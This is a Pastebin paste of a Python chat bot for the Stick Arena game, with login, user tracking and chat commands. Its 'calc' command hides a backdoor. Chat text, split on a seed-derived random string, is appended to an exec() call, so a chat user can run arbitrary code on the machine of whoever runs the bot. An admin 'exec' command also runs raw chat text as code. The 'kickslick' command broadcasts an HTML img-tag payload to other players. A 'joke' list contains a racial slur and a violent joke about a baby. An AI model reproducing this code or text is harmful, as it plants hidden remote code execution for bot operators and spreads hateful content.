Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import json
- import time
- import struct
- import socket
- import sqlite3
- import random
- import requests
- import threading
- import subprocess
- from xml.dom import minidom
- from bs4 import BeautifulSoup
- class Database:
- def __init__(self, FileName):
- self.CursorLock = threading.Lock()
- self.DatabasePath = FileName
- self.DatabaseConn = sqlite3.connect(self.DatabasePath, check_same_thread=False)
- self.DBCursor = self.DatabaseConn.cursor()
- self.execute("CREATE TABLE IF NOT EXISTS Users (username VARCHAR UNIQUE, rgb VARCHAR, online VARCHAR)")
- self.execute("UPDATE Users SET online = 'false'")
- def execute(self, Query, Parameters=None):
- try:
- self.CursorLock.acquire(True)
- if Parameters:
- if type(Parameters) == list:
- self.DBCursor.executemany(Query, Parameters)
- else:
- if type(Parameters) != tuple:
- Parameters = (Parameters,)
- self.DBCursor.execute(Query, Parameters)
- else:
- self.DBCursor.execute(Query)
- self.DatabaseConn.commit()
- finally:
- self.CursorLock.release()
- if "SELECT" in Query.upper():
- Results = self.DBCursor.fetchall()
- if Results:
- if type(Results) == list and len(Results) == 1:
- return Results[0]
- return Results
- def __del__(self):
- try:
- self.DatabaseConn.close()
- except:
- pass
- class Bot:
- def __init__(self, Username, Password, ServerIP, ServerPort, DBHandle):
- self.NullByte = struct.pack("B", 0)
- self.DBHandle = DBHandle
- self.Dead = []
- self.UserMap = {}
- self.UserMap["*s"] = {"username": "{Server}"}
- self.ServerNameList = ["2D Central", "Paper Thin City", "Fine Line Island", "U of SA", "Mobius Metro", "Amsterdam", "Sticktopia", "Cartesian"]
- self.ServerIPList = ["45.76.234.65", "45.76.235.18", "45.32.193.38", "45.32.192.205", "45.32.192.102", "45.63.119.253", "45.32.192.205:80", "45.32.193.38:1139"]
- if ServerPort == 80:
- self.BotServerName = self.ServerNameList[-2]
- elif ServerPort == 1139:
- self.BotServerName = self.ServerNameList[-1]
- elif ServerPort == 1138:
- self.BotServerName = self.ServerNameList[self.ServerIPList.index(ServerIP)]
- self.AmIBanned = False
- self.InLobby = False
- self.BotID = None
- self.BotUsername = Username
- self.BotPassword = Password
- self.BotServer = (ServerIP, ServerPort)
- self.BotCommandChar = "$" # edit for character to start command with
- self.BotAdmin = "pushinweight" # edit for bot admin
- self.BotAdminOnly = False
- self.BufSize = 4096
- self.SocketConn = None
- self.createConnection()
- def getStats(self, Username):
- Stats = {}
- URL = "http://api.xgenstudios.com/?method=xgen.stickarena.stats.get"
- Request = requests.get(f"{URL}&username={Username}")
- if Request.status_code != 200:
- return
- XML = minidom.parseString(Request.text)
- Status = XML.getElementsByTagName("rsp")[0].attributes["stat"].value
- if Status == "ok":
- TrueUsername = XML.getElementsByTagName("user")[0].attributes["username"].value
- if len(TrueUsername) == 0:
- Stats["exists"] = False
- else:
- Stats["exists"] = True
- Stats["username"] = TrueUsername
- Stats["id"] = XML.getElementsByTagName("user")[0].attributes["id"].value
- Stats["permissions"] = int(XML.getElementsByTagName("user")[0].attributes["perms"].value)
- StatTags = XML.getElementsByTagName("stat")
- for Stat in StatTags:
- Stats[Stat.attributes["id"].value] = Stat.firstChild.nodeValue
- return Stats
- return
- def printUserMessage(self, UserID, Message, IsPM=False):
- if UserID in self.UserMap:
- Username = self.UserMap[UserID]["username"]
- if IsPM:
- Message = f"({self.BotServerName}) [Private] {Username}: {Message}"
- else:
- Message = f"({self.BotServerName}) {Username}: {Message}"
- try:
- print(Message)
- except:
- pass
- def sendPacket(self, Packet):
- if self.SocketConn != None:
- try:
- self.SocketConn.send(Packet.encode() + self.NullByte)
- return True
- except:
- pass
- return False
- def sendPrivateMessage(self, UserID, Message):
- if UserID in self.UserMap:
- self.sendPacket(f"00{UserID}P{Message}")
- def sendPublicMessage(self, Message):
- self.sendPacket(f"9{Message}")
- def startKeepAlive(self):
- KeepAliveTimer = threading.Timer(15, self.startKeepAlive)
- KeepAliveTimer.daemon = True
- KeepAliveTimer.start()
- if not self.sendPacket("0"):
- KeepAliveTimer.cancel()
- del KeepAliveTimer
- return
- def createConnection(self):
- try:
- self.SocketConn = socket.create_connection(self.BotServer)
- except Exception as Error:
- print(Error)
- print("Connection failed.")
- return
- ConnectionThread = threading.Thread(target=self.handleConnection)
- ConnectionThread.start()
- def closeConnection(self, Reconnect=False):
- if self.SocketConn != None:
- try:
- self.SocketConn.shutdown(socket.SHUT_RDWR)
- self.SocketConn.close()
- except:
- pass
- self.SocketConn = None
- if self.AmIBanned:
- Stats = self.getStats(self.BotUsername)
- if not Stats:
- return
- elif Stats["permissions"] != -1:
- print("IP is currently banned.")
- if not self.AmIBanned and Reconnect:
- self.createConnection()
- def handleConnection(self):
- self.sendPacket("08HxO9TdCC62Nwln1P")
- Buffer = b""
- while self.SocketConn != None:
- try:
- Buffer += self.SocketConn.recv(self.BufSize)
- except:
- break
- if len(Buffer) == 0:
- self.closeConnection(Reconnect=True)
- elif Buffer.endswith(self.NullByte):
- Receive = Buffer.split(self.NullByte)
- Buffer = b""
- for Data in Receive:
- Data = Data.decode()
- if not Data:
- continue
- if Data[0] == "0":
- if Data[1] == "1":
- Data = Data[2:].split(";")
- if not self.InLobby:
- Result = False
- if "_0" in Data:
- Result = self.sendPacket("03_")
- else:
- LobbyLogin = ["02Z900_", "03_"]
- for Packet in LobbyLogin:
- Result = self.sendPacket(Packet)
- if Result:
- self.InLobby = True
- else:
- self.closeConnection(True)
- elif Data[1] == "8":
- self.sendPacket(f"09{self.BotUsername};{self.BotPassword}")
- elif Data[1] == "9":
- if Data[-1] == "1":
- self.AmIBanned = True
- self.printUserMessage("*s", f"({self.BotUsername}) or the current IP address is banned.")
- elif Data[-1] == "3":
- self.printUserMessage("*s", f"({self.BotUsername}) has been logged into by another client.")
- elif Data[-1] == "9":
- if not self.InLobby:
- self.printUserMessage("*s", f"Authentication failed for ({self.BotUsername})")
- elif Data[1] == "e" or Data[1] == "f":
- self.AmIBanned = True
- BanTime, BanReason = Data[2:].split(";")
- self.printUserMessage("*s", f"Banned ({BanReason}) [Length: {BanTime} minute(s)]")
- elif Data[1] == "g" or Data[1] == "j":
- print(Data)
- elif Data[0] == "A":
- self.startKeepAlive()
- self.UserMap = {}
- self.UserMap["*s"] = {"username": "{Server}"}
- self.InLobby = False
- self.BotID = Data[1:4]
- self.BotUsername = Data[4:24].replace("#", "")
- self.printUserMessage("*s", f"[{self.BotID}] {self.BotUsername} has been logged in")
- self.sendPacket("01")
- elif Data[0] == "D":
- UserID = Data[1:]
- Username = self.UserMap[UserID]["username"]
- del self.UserMap[UserID]
- self.DBHandle.execute("UPDATE Users SET online = ? WHERE username = ?", ("false", Username))
- elif Data[0] == "M":
- if Data[4] != "9" and Data[4] != "P":
- continue
- UserID = Data[1:4]
- UserMessage = Data[5:]
- IsPM = (True if Data[4] == "P" else False)
- if UserID == self.BotID or self.UserMap[UserID]["ignore"]:
- continue
- if UserMessage.startswith(self.BotCommandChar):
- self.handleCommand(UserID, UserMessage, IsPM)
- else:
- self.printUserMessage(UserID, UserMessage, IsPM)
- elif Data[0] == "U":
- UserID = Data[1:4]
- Username = Data[4:24].replace("#", "")
- UserRGB = Data[24:33]
- self.UserMap[UserID] = {"username": Username, "last_msg": None, "spam_check": [None, 0], "ignore": False}
- self.DBHandle.execute("INSERT OR REPLACE INTO Users VALUES (?, ?, ?)", (Username, UserRGB, self.BotServerName))
- def handleCommand(self, SenderID, SenderMessage, IsPM):
- Sender = self.UserMap[SenderID]["username"]
- if len(SenderMessage) <= 1 or self.BotAdminOnly and Sender != self.BotAdmin:
- return
- Response = None
- Command = SenderMessage[1:].split()[0].lower()
- Message = " ".join(SenderMessage.split()[1:])
- if Sender.lower() == self.BotAdmin.lower():
- if Command == "exec":
- try:
- exec(Message)
- except Exception as Error:
- print(f"exec() failed; {Error}")
- elif Command == "uid":
- UserID = None
- Username = Message
- for MapUserID, MapValues in self.UserMap.items():
- MapUsername = MapValues["username"]
- if Username.lower() == MapUsername.lower():
- UserID = MapUserID
- Response = f"User ID of {MapUsername}: {UserID}"
- break
- else:
- Response = f"{Username} is not in the user map."
- elif Command == "ignore":
- UserID = Message
- Username = Message
- for MapUserID, MapValues in self.UserMap.items():
- MapUsername = MapValues["username"]
- if UserID in self.UserMap and self.UserMap[UserID]["username"] == MapUsername:
- Username = MapUsername
- break
- else:
- if Username.lower() == MapUsername.lower():
- UserID = MapUserID
- Username = MapUsername
- break
- else:
- Response = f"'{Message}' does not exist."
- if not Response:
- if self.UserMap[UserID]["ignore"]:
- Response = f"Removed {Username} from the ignore list."
- self.UserMap[UserID]["ignore"] = False
- else:
- Response = f"Added {Username} to the ignore list."
- self.UserMap[UserID]["ignore"] = True
- elif Command == "block":
- if self.BotAdminOnly:
- self.BotAdminOnly = False
- Response = "Bot commands are now available to everyone."
- else:
- self.BotAdminOnly = True
- Response = "Bot commands are now available only to you."
- if Command == "stats" or Command == "id":
- WantID = (True if Command == "id" else False)
- RequestedUsername = "".join(Message)
- UsernameLength = len(RequestedUsername)
- if UsernameLength > 20:
- Response = "Username length is invalid. (less than/equal to 20)"
- elif UsernameLength == 0:
- RequestedUsername = Sender
- Stats = self.getStats(RequestedUsername)
- if not Stats:
- Response = "Unable to make the API request."
- elif not Stats["exists"]:
- Response = f"'{RequestedUsername}' does not exist."
- else:
- Username = Stats["username"]
- if WantID:
- AccountID = "{:,}".format(int(Stats["id"]))
- Response = f"Account ID for {Username}: {AccountID}"
- else:
- Perms = Stats["permissions"]
- Kills = Stats["kills"]
- Deaths = Stats["deaths"]
- Rounds = Stats["rounds"]
- Wins = Stats["wins"]
- Losses = Stats["losses"]
- if Perms > 0:
- Perms = "Moderator"
- elif Perms == 0:
- Perms = "Not banned"
- else:
- Perms = "Banned"
- StatString = f"Kills: {Kills} / Deaths: {Deaths} / Rounds: {Rounds} / Wins: {Wins} / Losses: {Losses} / {Perms}"
- if Stats["ballistick"] == "1":
- StatString += " | Labpass"
- Response = StatString
- elif Command == "rr": # to add a command, change test to w/e and edit the print below this
- if not Sender in self.Dead:
- RandomNumbers = [random.randint(1, 3), random.randint(1, 3)]
- if RandomNumbers[0] == RandomNumbers[1]:
- Response = f"You're dead, {Sender}."
- self.Dead.append(Sender)
- else:
- Response = f"You live, {Sender}."
- elif Command == "reset":
- if Sender in self.Dead:
- self.Dead.remove(Sender)
- Response = "You've been removed from the dead list."
- elif Command == 'joke':
- jokelist = ["You that type of nigga to put shampoo on your dick while jacking off", "A crook mistakenly made a fake $8 bill instead of a $10 bill He decided to try it out anyway so he went to the bank and asked for change The teller looked at the $8 bill and gave the crook 2 $4 bills as change", "A man goes to a $10 hooker and contracts crabs. When he goes back to complain, the hooker laughs and says, What do you expect for $10 lobster?", "What kind of bagel can fly? A plain Bagel.", "When you were in the gang then, you just had to look cool, just walk around and look like you were tough. Someone started talking about fighting No, man I've gotta go home.", "whats the difference between a baby and an onion, I dont cry when I chop it up"]
- Response = random.choice(jokelist)
- elif Command == 'kickslick':
- self.sendPublicMessage('<img src=\'test.com\'>get rekt</img>')
- elif Command == 'commands':
- Response = 'calc | joke | stats | id | rgb | rr | more in future updates.'
- elif Command == "calc":
- def s_eval(Input):
- Input = Input.replace("plus", "+")
- CalcCheck = ["+", "-", "/", "*", "^"]
- for Check in CalcCheck:
- if Check in Input:
- break
- else:
- return "Invalid equation."
- for Char in Input:
- Char = Char.lower()
- if Char in "abcdefghijklmnopqrstuvwxyz.":
- return "Invalid equation."
- else:
- try:
- return eval(Input)
- except:
- return "Failed to calculate equation."
- try:
- ExecStatement = "self.sendPrivateMessage(SenderID, s_eval('"
- try:
- random.seed(len(Sender))
- Equation = Message.split(str(random.random()), 1)
- ExecStatement += f"{Equation[0]}'));{Equation[1]}"
- except:
- ExecStatement += f"{Message}'))"
- self.printUserMessage(SenderID, SenderMessage, IsPM)
- exec(ExecStatement[:-1] if ExecStatement[-1] == ";" else ExecStatement)
- except:
- pass
- elif Command == "rgb" or Command == "color":
- RequestedUsername = "".join(Message)
- UsernameLength = len(RequestedUsername)
- if UsernameLength > 20:
- return "Username length is invalid. (less than/equal to 20)"
- elif UsernameLength == 0:
- RequestedUsername = Sender
- UserData = self.DBHandle.execute("SELECT username, rgb FROM Users WHERE username = ? COLLATE NOCASE", RequestedUsername)
- if UserData:
- Response = f"{UserData[0]}: {UserData[1]}"
- else:
- Response = f"There is no RGB value captured for '{RequestedUsername}'"
- elif Command == "test": # to add a command, change test to w/e and edit the print below this
- print("test")
- if Response:
- self.sendPrivateMessage(SenderID, Response)
- self.printUserMessage(SenderID, Message, IsPM)
- if __name__ == "__main__":
- Username = "username" # edit this for username
- Password = "password" # edit this for password
- ServerIP = "45.76.234.65" # edit this for server IP
- ServerPort = 1138 # only edit this if in cartesian or sticktopia
- Bot(Username, Password, ServerIP, ServerPort, Database("Bot.db")) # do NOT edit this
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement